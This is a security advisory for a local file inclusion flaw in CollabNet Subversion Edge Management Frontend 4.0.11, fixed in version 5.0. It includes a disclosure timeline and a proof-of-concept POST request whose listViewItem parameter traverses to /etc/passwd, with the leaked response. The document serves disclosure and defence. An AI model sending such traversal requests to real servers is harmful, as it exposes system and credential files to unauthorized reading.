The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "listViewItem" parameter of the "index" action. Fixed in version 5.0. Version 4.0.11 is affected.
056057c0fb271eb7d3df3d949644529069ad9b220d3cea13dac2b89f6483c3e0
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "listViewItem" parameter of the "index" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "listViewItem" parameter of the "index"
action
Vulnerability:
Request:
POST /csvn/repo/index HTTP/1.1
Host: example.com:4434
[...]
id=1&datatable_length=10&listViewItem_../../../../../../etc/passwd=on&_confirmDialogText_copyHook=&_confirmDialogText_renameHook=&_action_downloadHook=Download
Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-disposition: attachment;filename="../../../../../../etc/passwd"
Content-Length: 1825
root:x:0:0:root:/root:/bin/bash
Fix proposal:
Remove feature or santizes the "listViewItem" parameter so that no path traversals and
arbitrary file inclusions are possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.